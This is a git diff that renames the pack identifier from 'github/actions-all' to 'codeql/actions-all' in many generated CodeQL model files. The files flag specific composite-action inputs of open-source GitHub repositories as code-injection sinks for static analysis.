diff --git a/ql/lib/ext/generated/composite-actions/r-lib_actions.model.yml b/ql/lib/ext/generated/composite-actions/r-lib_actions.model.yml index 0aabf2e1d7f1..ef7bf632aee7 100644 --- a/ql/lib/ext/generated/composite-actions/r-lib_actions.model.yml +++ b/ql/lib/ext/generated/composite-actions/r-lib_actions.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["r-lib/actions", "*", "input.lockfile-create-lib", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/randombit_botan.model.yml b/ql/lib/ext/generated/composite-actions/randombit_botan.model.yml index 6fdfb2e6eba0..1aa3eedfe897 100644 --- a/ql/lib/ext/generated/composite-actions/randombit_botan.model.yml +++ b/ql/lib/ext/generated/composite-actions/randombit_botan.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["randombit/botan", "*", "input.target", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/raspberrypi_documentation.model.yml b/ql/lib/ext/generated/composite-actions/raspberrypi_documentation.model.yml index b068e810823e..aa9670d3de3c 100644 --- a/ql/lib/ext/generated/composite-actions/raspberrypi_documentation.model.yml +++ b/ql/lib/ext/generated/composite-actions/raspberrypi_documentation.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["raspberrypi/documentation", "*", "input.secondary_host", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/ray-project_kuberay.model.yml b/ql/lib/ext/generated/composite-actions/ray-project_kuberay.model.yml index 9107fd9e85cf..79cc879fa67c 100644 --- a/ql/lib/ext/generated/composite-actions/ray-project_kuberay.model.yml +++ b/ql/lib/ext/generated/composite-actions/ray-project_kuberay.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["ray-project/kuberay", "*", "input.ray_version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/readthedocs_actions.model.yml b/ql/lib/ext/generated/composite-actions/readthedocs_actions.model.yml index ee81ae110455..f8964efbc562 100644 --- a/ql/lib/ext/generated/composite-actions/readthedocs_actions.model.yml +++ b/ql/lib/ext/generated/composite-actions/readthedocs_actions.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["readthedocs/actions", "*", "input.single-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/reflex-dev_reflex.model.yml b/ql/lib/ext/generated/composite-actions/reflex-dev_reflex.model.yml index a8030627789f..102d0aa85e56 100644 --- a/ql/lib/ext/generated/composite-actions/reflex-dev_reflex.model.yml +++ b/ql/lib/ext/generated/composite-actions/reflex-dev_reflex.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["reflex-dev/reflex", "*", "input.create-venv-at-path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/renovatebot_renovate.model.yml b/ql/lib/ext/generated/composite-actions/renovatebot_renovate.model.yml index a89b000bedff..c1743b69eb21 100644 --- a/ql/lib/ext/generated/composite-actions/renovatebot_renovate.model.yml +++ b/ql/lib/ext/generated/composite-actions/renovatebot_renovate.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["renovatebot/renovate", "*", "input.node-version", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/composite-actions/rethinkdb_rethinkdb.model.yml b/ql/lib/ext/generated/composite-actions/rethinkdb_rethinkdb.model.yml index a98ea12496f6..47a1811b49f7 100644 --- a/ql/lib/ext/generated/composite-actions/rethinkdb_rethinkdb.model.yml +++ b/ql/lib/ext/generated/composite-actions/rethinkdb_rethinkdb.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["rethinkdb/rethinkdb", "*", "input.command", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/risc0_risc0.model.yml b/ql/lib/ext/generated/composite-actions/risc0_risc0.model.yml index 8475ef342402..9941f981d758 100644 --- a/ql/lib/ext/generated/composite-actions/risc0_risc0.model.yml +++ b/ql/lib/ext/generated/composite-actions/risc0_risc0.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["risc0/risc0", "*", "input.key", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/rocketchat_rocket.chat.model.yml b/ql/lib/ext/generated/composite-actions/rocketchat_rocket.chat.model.yml index fff5eaab1f49..eac3e751bdea 100644 --- a/ql/lib/ext/generated/composite-actions/rocketchat_rocket.chat.model.yml +++ b/ql/lib/ext/generated/composite-actions/rocketchat_rocket.chat.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["rocketchat/rocket.chat", "*", "input.build-containers", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/rook_rook.model.yml b/ql/lib/ext/generated/composite-actions/rook_rook.model.yml index 5d0cef62b0b4..3c613a4eb882 100644 --- a/ql/lib/ext/generated/composite-actions/rook_rook.model.yml +++ b/ql/lib/ext/generated/composite-actions/rook_rook.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["rook/rook", "*", "input.use-tmate", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/roots_trellis.model.yml b/ql/lib/ext/generated/composite-actions/roots_trellis.model.yml index 3edfa5ef14db..b846058b3f06 100644 --- a/ql/lib/ext/generated/composite-actions/roots_trellis.model.yml +++ b/ql/lib/ext/generated/composite-actions/roots_trellis.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["roots/trellis", "*", "input.path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/ruby_debug.model.yml b/ql/lib/ext/generated/composite-actions/ruby_debug.model.yml index d5f640e91a59..7337d8896f37 100644 --- a/ql/lib/ext/generated/composite-actions/ruby_debug.model.yml +++ b/ql/lib/ext/generated/composite-actions/ruby_debug.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["ruby/debug", "*", "input.report-path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/ruby_ruby.model.yml b/ql/lib/ext/generated/composite-actions/ruby_ruby.model.yml index 32945cb21e30..3c6675a13c9e 100644 --- a/ql/lib/ext/generated/composite-actions/ruby_ruby.model.yml +++ b/ql/lib/ext/generated/composite-actions/ruby_ruby.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["ruby/ruby", "*", "input.builddir", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/rusefi_rusefi.model.yml b/ql/lib/ext/generated/composite-actions/rusefi_rusefi.model.yml index 42eeca98de4c..9f0f612d1a60 100644 
--- a/ql/lib/ext/generated/composite-actions/rusefi_rusefi.model.yml +++ b/ql/lib/ext/generated/composite-actions/rusefi_rusefi.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["rusefi/rusefi", "*", "input.RUSEFI_OBFUSCATED_PUBLIC_SSH_SERVER", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/saltstack_salt.model.yml b/ql/lib/ext/generated/composite-actions/saltstack_salt.model.yml index 5c0777ce394a..9e5715f26385 100644 --- a/ql/lib/ext/generated/composite-actions/saltstack_salt.model.yml +++ b/ql/lib/ext/generated/composite-actions/saltstack_salt.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["saltstack/salt", "*", "input.version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/saltstack_salt.yml b/ql/lib/ext/generated/composite-actions/saltstack_salt.yml index ac777af02856..02fe0539869e 100644 --- a/ql/lib/ext/generated/composite-actions/saltstack_salt.yml +++ b/ql/lib/ext/generated/composite-actions/saltstack_salt.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSummaryModel data: - ["saltstack/salt", "*", "input.version", "output.version", "taint", "manual"] diff --git a/ql/lib/ext/generated/composite-actions/sap_sapmachine.model.yml b/ql/lib/ext/generated/composite-actions/sap_sapmachine.model.yml index 26a587e4f5c6..86be8acfeea0 100644 --- a/ql/lib/ext/generated/composite-actions/sap_sapmachine.model.yml +++ b/ql/lib/ext/generated/composite-actions/sap_sapmachine.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["sap/sapmachine", "*", "input.debug-suffix", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/composite-actions/scala-native_scala-native.model.yml b/ql/lib/ext/generated/composite-actions/scala-native_scala-native.model.yml index a26ebcfa57dc..fff292f42bbd 100644 --- a/ql/lib/ext/generated/composite-actions/scala-native_scala-native.model.yml +++ b/ql/lib/ext/generated/composite-actions/scala-native_scala-native.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["scala-native/scala-native", "*", "input.llvm-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/scitools_iris.model.yml b/ql/lib/ext/generated/composite-actions/scitools_iris.model.yml index bf39b24e8411..141c52a8ccd3 100644 --- a/ql/lib/ext/generated/composite-actions/scitools_iris.model.yml +++ b/ql/lib/ext/generated/composite-actions/scitools_iris.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["scitools/iris", "*", "input.version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/scylladb_scylla-operator.model.yml b/ql/lib/ext/generated/composite-actions/scylladb_scylla-operator.model.yml index 00cb4906bb51..a073f87d9454 100644 --- a/ql/lib/ext/generated/composite-actions/scylladb_scylla-operator.model.yml +++ b/ql/lib/ext/generated/composite-actions/scylladb_scylla-operator.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["scylladb/scylla-operator", "*", "input.containerImageName", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/shader-slang_slang.model.yml b/ql/lib/ext/generated/composite-actions/shader-slang_slang.model.yml index 85f583a5e880..5e10745332bd 100644 --- a/ql/lib/ext/generated/composite-actions/shader-slang_slang.model.yml 
+++ b/ql/lib/ext/generated/composite-actions/shader-slang_slang.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["shader-slang/slang", "*", "input.platform", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/shaka-project_shaka-player.model.yml b/ql/lib/ext/generated/composite-actions/shaka-project_shaka-player.model.yml index 207b5705e513..e278f0849bff 100644 --- a/ql/lib/ext/generated/composite-actions/shaka-project_shaka-player.model.yml +++ b/ql/lib/ext/generated/composite-actions/shaka-project_shaka-player.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["shaka-project/shaka-player", "*", "input.state", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/shakacode_react-webpack-rails-tutorial.model.yml b/ql/lib/ext/generated/composite-actions/shakacode_react-webpack-rails-tutorial.model.yml index f0f3be91b4ba..45598fe4bc78 100644 --- a/ql/lib/ext/generated/composite-actions/shakacode_react-webpack-rails-tutorial.model.yml +++ b/ql/lib/ext/generated/composite-actions/shakacode_react-webpack-rails-tutorial.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["shakacode/react-webpack-rails-tutorial", "*", "input.org", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/simple-icons_simple-icons.model.yml b/ql/lib/ext/generated/composite-actions/simple-icons_simple-icons.model.yml index 04e779b9579a..f1689c520290 100644 --- a/ql/lib/ext/generated/composite-actions/simple-icons_simple-icons.model.yml +++ b/ql/lib/ext/generated/composite-actions/simple-icons_simple-icons.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["simple-icons/simple-icons", "*", "input.issue_number", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/slint-ui_slint.model.yml b/ql/lib/ext/generated/composite-actions/slint-ui_slint.model.yml index 7939469934e8..00ae4bfb9b85 100644 --- a/ql/lib/ext/generated/composite-actions/slint-ui_slint.model.yml +++ b/ql/lib/ext/generated/composite-actions/slint-ui_slint.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["slint-ui/slint", "*", "input.extra-packages", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/solidusio_solidus.model.yml b/ql/lib/ext/generated/composite-actions/solidusio_solidus.model.yml index 1af5c9435afb..1bd2cf924182 100644 --- a/ql/lib/ext/generated/composite-actions/solidusio_solidus.model.yml +++ b/ql/lib/ext/generated/composite-actions/solidusio_solidus.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["solidusio/solidus", "*", "input.last_minor", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/solo-io_gloo.model.yml b/ql/lib/ext/generated/composite-actions/solo-io_gloo.model.yml index bcb9dc853d6d..2dc89f564f5d 100644 --- a/ql/lib/ext/generated/composite-actions/solo-io_gloo.model.yml +++ b/ql/lib/ext/generated/composite-actions/solo-io_gloo.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["solo-io/gloo", "*", "input.base-ref", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/composite-actions/sonarr_sonarr.model.yml b/ql/lib/ext/generated/composite-actions/sonarr_sonarr.model.yml index ec5b1a4e50c4..9dbd2fce9892 100644 --- a/ql/lib/ext/generated/composite-actions/sonarr_sonarr.model.yml +++ b/ql/lib/ext/generated/composite-actions/sonarr_sonarr.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["sonarr/sonarr", "*", "input.filter", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/sonic-pi-net_sonic-pi.model.yml b/ql/lib/ext/generated/composite-actions/sonic-pi-net_sonic-pi.model.yml index 2f0bb66127b4..7722a6353072 100644 --- a/ql/lib/ext/generated/composite-actions/sonic-pi-net_sonic-pi.model.yml +++ b/ql/lib/ext/generated/composite-actions/sonic-pi-net_sonic-pi.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["sonic-pi-net/sonic-pi", "*", "input.command", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/spacedriveapp_spacedrive.model.yml b/ql/lib/ext/generated/composite-actions/spacedriveapp_spacedrive.model.yml index 65953f0387ab..4fc41527037c 100644 --- a/ql/lib/ext/generated/composite-actions/spacedriveapp_spacedrive.model.yml +++ b/ql/lib/ext/generated/composite-actions/spacedriveapp_spacedrive.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["spacedriveapp/spacedrive", "*", "input.setup-arg", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/spockframework_spock.model.yml b/ql/lib/ext/generated/composite-actions/spockframework_spock.model.yml index 035e331a007f..729aa139693e 100644 --- a/ql/lib/ext/generated/composite-actions/spockframework_spock.model.yml 
+++ b/ql/lib/ext/generated/composite-actions/spockframework_spock.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["spockframework/spock", "*", "input.additional-java-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/spring-io_initializr.model.yml b/ql/lib/ext/generated/composite-actions/spring-io_initializr.model.yml index 1cf431a75736..e08457ef5ea7 100644 --- a/ql/lib/ext/generated/composite-actions/spring-io_initializr.model.yml +++ b/ql/lib/ext/generated/composite-actions/spring-io_initializr.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["spring-io/initializr", "*", "input.run-name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/spring-io_start.spring.io.model.yml b/ql/lib/ext/generated/composite-actions/spring-io_start.spring.io.model.yml index 669d7f443b13..c19a1fc3eef1 100644 --- a/ql/lib/ext/generated/composite-actions/spring-io_start.spring.io.model.yml +++ b/ql/lib/ext/generated/composite-actions/spring-io_start.spring.io.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["spring-io/start.spring.io", "*", "input.run-name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/spring-projects_spring-boot.model.yml b/ql/lib/ext/generated/composite-actions/spring-projects_spring-boot.model.yml index b53f09499031..a719b0dc87e7 100644 --- a/ql/lib/ext/generated/composite-actions/spring-projects_spring-boot.model.yml +++ b/ql/lib/ext/generated/composite-actions/spring-projects_spring-boot.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["spring-projects/spring-boot", "*", "input.run-name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/spring-projects_spring-framework.model.yml b/ql/lib/ext/generated/composite-actions/spring-projects_spring-framework.model.yml index 4e9af4a1a8eb..9a9b3a5d3df8 100644 --- a/ql/lib/ext/generated/composite-actions/spring-projects_spring-framework.model.yml +++ b/ql/lib/ext/generated/composite-actions/spring-projects_spring-framework.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["spring-projects/spring-framework", "*", "input.run-name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/spring-projects_spring-graphql.model.yml b/ql/lib/ext/generated/composite-actions/spring-projects_spring-graphql.model.yml index 3fd31a3612fa..3f9b4ea61cc5 100644 --- a/ql/lib/ext/generated/composite-actions/spring-projects_spring-graphql.model.yml +++ b/ql/lib/ext/generated/composite-actions/spring-projects_spring-graphql.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["spring-projects/spring-graphql", "*", "input.run-name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/square_workflow-kotlin.model.yml b/ql/lib/ext/generated/composite-actions/square_workflow-kotlin.model.yml index 090bf1afc851..6e36f5dea2be 100644 --- a/ql/lib/ext/generated/composite-actions/square_workflow-kotlin.model.yml +++ b/ql/lib/ext/generated/composite-actions/square_workflow-kotlin.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["square/workflow-kotlin", "*", "input.commit-message", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/stefanprodan_podinfo.model.yml b/ql/lib/ext/generated/composite-actions/stefanprodan_podinfo.model.yml index 47afbc44f765..f1b143d7c44f 100644 --- a/ql/lib/ext/generated/composite-actions/stefanprodan_podinfo.model.yml +++ b/ql/lib/ext/generated/composite-actions/stefanprodan_podinfo.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["stefanprodan/podinfo", "*", "input.version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/stellar_go.model.yml b/ql/lib/ext/generated/composite-actions/stellar_go.model.yml index 4e173c717e57..42d9df16b35d 100644 --- a/ql/lib/ext/generated/composite-actions/stellar_go.model.yml +++ b/ql/lib/ext/generated/composite-actions/stellar_go.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["stellar/go", "*", "input.go-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/streetsidesoftware_cspell.model.yml b/ql/lib/ext/generated/composite-actions/streetsidesoftware_cspell.model.yml index 8091471b3c03..386b0aa6ea94 100644 --- a/ql/lib/ext/generated/composite-actions/streetsidesoftware_cspell.model.yml +++ b/ql/lib/ext/generated/composite-actions/streetsidesoftware_cspell.model.yml 
@@ -1,11 +1,11 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["streetsidesoftware/cspell", "*", "input.name", "code-injection", "generated"] - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSummaryModel data: - ["streetsidesoftware/cspell", "*", "input.value", "output.value", "taint", "manual"] diff --git a/ql/lib/ext/generated/composite-actions/subquery_subql.model.yml b/ql/lib/ext/generated/composite-actions/subquery_subql.model.yml index a3b3a5624c1e..54bf59f06470 100644 --- a/ql/lib/ext/generated/composite-actions/subquery_subql.model.yml +++ b/ql/lib/ext/generated/composite-actions/subquery_subql.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["subquery/subql", "*", "input.package-path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/swagger-api_swagger-codegen.model.yml b/ql/lib/ext/generated/composite-actions/swagger-api_swagger-codegen.model.yml index 22264f3f29f9..2a2a8fcc2063 100644 --- a/ql/lib/ext/generated/composite-actions/swagger-api_swagger-codegen.model.yml +++ b/ql/lib/ext/generated/composite-actions/swagger-api_swagger-codegen.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["swagger-api/swagger-codegen", "*", "input.options", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/swagger-api_swagger-parser.model.yml b/ql/lib/ext/generated/composite-actions/swagger-api_swagger-parser.model.yml index e33a45e698ba..05dbdf6bf45b 100644 --- a/ql/lib/ext/generated/composite-actions/swagger-api_swagger-parser.model.yml +++ b/ql/lib/ext/generated/composite-actions/swagger-api_swagger-parser.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["swagger-api/swagger-parser", "*", "input.logsPath", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/tarantool_tarantool.model.yml b/ql/lib/ext/generated/composite-actions/tarantool_tarantool.model.yml index a2d5e1ef7a33..4276ce4b98dd 100644 --- a/ql/lib/ext/generated/composite-actions/tarantool_tarantool.model.yml +++ b/ql/lib/ext/generated/composite-actions/tarantool_tarantool.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["tarantool/tarantool", "*", "input.source", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/telepresenceio_telepresence.model.yml b/ql/lib/ext/generated/composite-actions/telepresenceio_telepresence.model.yml index e0ae2bc70bdb..ac210c93a1ec 100644 --- a/ql/lib/ext/generated/composite-actions/telepresenceio_telepresence.model.yml +++ b/ql/lib/ext/generated/composite-actions/telepresenceio_telepresence.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["telepresenceio/telepresence", "*", "input.release_version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/tensorflow_datasets.model.yml b/ql/lib/ext/generated/composite-actions/tensorflow_datasets.model.yml index 7926fa4e083e..501d4a8a45f5 100644 --- a/ql/lib/ext/generated/composite-actions/tensorflow_datasets.model.yml +++ b/ql/lib/ext/generated/composite-actions/tensorflow_datasets.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["tensorflow/datasets", "*", "input.extras", "code-injection", "generated"] 
diff --git a/ql/lib/ext/generated/composite-actions/texstudio-org_texstudio.model.yml b/ql/lib/ext/generated/composite-actions/texstudio-org_texstudio.model.yml index 2369c82bcb7a..b582844dc7c8 100644 --- a/ql/lib/ext/generated/composite-actions/texstudio-org_texstudio.model.yml +++ b/ql/lib/ext/generated/composite-actions/texstudio-org_texstudio.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["texstudio-org/texstudio", "*", "input.file", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/toeverything_affine.model.yml b/ql/lib/ext/generated/composite-actions/toeverything_affine.model.yml index d388b1a55b31..9de223281878 100644 --- a/ql/lib/ext/generated/composite-actions/toeverything_affine.model.yml +++ b/ql/lib/ext/generated/composite-actions/toeverything_affine.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["toeverything/affine", "*", "input.extra-flags", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/treeverse_lakefs.model.yml b/ql/lib/ext/generated/composite-actions/treeverse_lakefs.model.yml index dade6e8c958a..7234c3cbd5f4 100644 --- a/ql/lib/ext/generated/composite-actions/treeverse_lakefs.model.yml +++ b/ql/lib/ext/generated/composite-actions/treeverse_lakefs.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["treeverse/lakefs", "*", "input.compose-flags", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/trezor_trezor-firmware.model.yml b/ql/lib/ext/generated/composite-actions/trezor_trezor-firmware.model.yml index 9ac87054f10a..27ee66eae484 100644 --- a/ql/lib/ext/generated/composite-actions/trezor_trezor-firmware.model.yml 
+++ b/ql/lib/ext/generated/composite-actions/trezor_trezor-firmware.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["trezor/trezor-firmware", "*", "input.lang", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/tribler_tribler.model.yml b/ql/lib/ext/generated/composite-actions/tribler_tribler.model.yml index 3f9f3f632070..96586d295343 100644 --- a/ql/lib/ext/generated/composite-actions/tribler_tribler.model.yml +++ b/ql/lib/ext/generated/composite-actions/tribler_tribler.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["tribler/tribler", "*", "input.libsodium-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/trunk-io_trunk-action.model.yml b/ql/lib/ext/generated/composite-actions/trunk-io_trunk-action.model.yml index aff068890ad4..5e7e997272d3 100644 --- a/ql/lib/ext/generated/composite-actions/trunk-io_trunk-action.model.yml +++ b/ql/lib/ext/generated/composite-actions/trunk-io_trunk-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["trunk-io/trunk-action", "*", "input.tools", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/unidata_metpy.model.yml b/ql/lib/ext/generated/composite-actions/unidata_metpy.model.yml index 0304e585bb6f..8a9326121006 100644 --- a/ql/lib/ext/generated/composite-actions/unidata_metpy.model.yml +++ b/ql/lib/ext/generated/composite-actions/unidata_metpy.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["unidata/metpy", "*", "input.key", "code-injection", "generated"] \ No newline at end of file 
